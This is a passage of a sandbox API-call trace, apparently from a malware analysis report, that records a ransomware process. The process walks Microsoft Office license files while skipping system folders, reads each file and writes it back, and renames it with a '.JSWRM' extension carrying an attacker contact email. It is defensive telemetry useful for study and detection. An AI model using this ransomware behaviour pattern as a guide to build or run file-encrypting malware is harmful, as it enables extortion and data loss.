(HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0109.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0109.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0109.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0109.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0109.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0109.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.218] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea498653, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea498653, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea57d3ec, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", cAlternateFileName="PR0BBA~1.XRM")) returned 1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.218] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0109.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0109.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0109.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0109.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0109.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.219] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0109.219] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.219] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.260] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.261] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.261] CloseHandle (hObject=0x45c) returned 1 [0109.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0109.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0109.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0109.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0109.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0109.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0109.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.261] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0109.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0109.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0109.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.264] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea3b3820, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea3b3820, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea498653, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", cAlternateFileName="PR72F6~1.XRM")) returned 1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.264] lstrcmpiW (lpString1="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0109.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0109.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0109.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp6-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0109.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.265] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0109.265] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.266] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.268] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.268] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.269] CloseHandle (hObject=0x45c) returned 1 [0109.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0109.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0109.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0109.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0109.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0109.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0109.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp6-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp6-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0109.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0109.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.270] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea4be895, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea4be895, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea5c9955, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Retail-pl.xrm-ms", cAlternateFileName="PRB4D9~1.XRM")) returned 1 [0109.270] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0109.270] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0109.270] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0109.270] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0109.270] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0109.270] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.271] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.271] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.271] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.271] lstrcmpiW (lpString1="ProPlusR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0109.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0109.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0109.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240fe8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0109.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0109.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0109.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.272] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10635) returned 1 [0109.272] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0109.272] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0109.275] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.275] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0109.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.275] CloseHandle (hObject=0x45c) returned 1 [0109.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.276] RtlAllocateHeap 